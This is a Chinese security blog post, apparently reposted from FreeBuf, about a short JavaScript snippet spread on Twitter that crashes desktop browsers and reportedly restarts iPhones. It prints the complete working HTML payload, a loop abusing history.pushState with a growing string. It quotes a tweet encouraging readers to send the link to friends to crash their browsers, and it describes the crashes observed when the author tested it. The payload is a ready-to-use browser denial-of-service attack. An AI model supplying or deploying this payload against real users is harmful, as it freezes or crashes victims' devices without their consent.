您的足迹:首页 > 精彩文章 >这十二行代码是如何让浏览器爆炸的?

这十二行代码是如何让浏览器爆炸的?

起因

今天刷推特的时候发现Cyber Security@cyber__sec的推文让人眼前一亮:

Crash firefox, chrome, safari browsers, and also restart iPhone using this javascript code. #dos #0day #exploit
//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iPhone重启。

继续在推特上深挖发现IT Security Tweets ™ @F1r3h4nd 于17日发推:

Crash your friend's browser and restart iPhone with a link which has this script: #0day
//把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让iPhone重启。

完整HTML代码如下:

<html><body><script>var total="";for (var i=0;i<1000000;i++){    total= total+i.toString();    history.pushState(0,0,total);}</script></body></html>

接来下会发生什么?

点开以后,我的状态是这样的:

如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现。22:49 修正:iPhone用Safari打开之后链接之后,手机注销重启了!…

本文摘自FreeBuf,原文链接为:http://www.freebuf.com/articles/terminal/93807.html

本博客所有文章如无特别注明均为原创。作者:0nise复制或转载请以超链接形式注明转自 0nise's Blog ---1931sec TeAm!
原文地址《这十二行代码是如何让浏览器爆炸的?

相关推荐

  • blogger

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)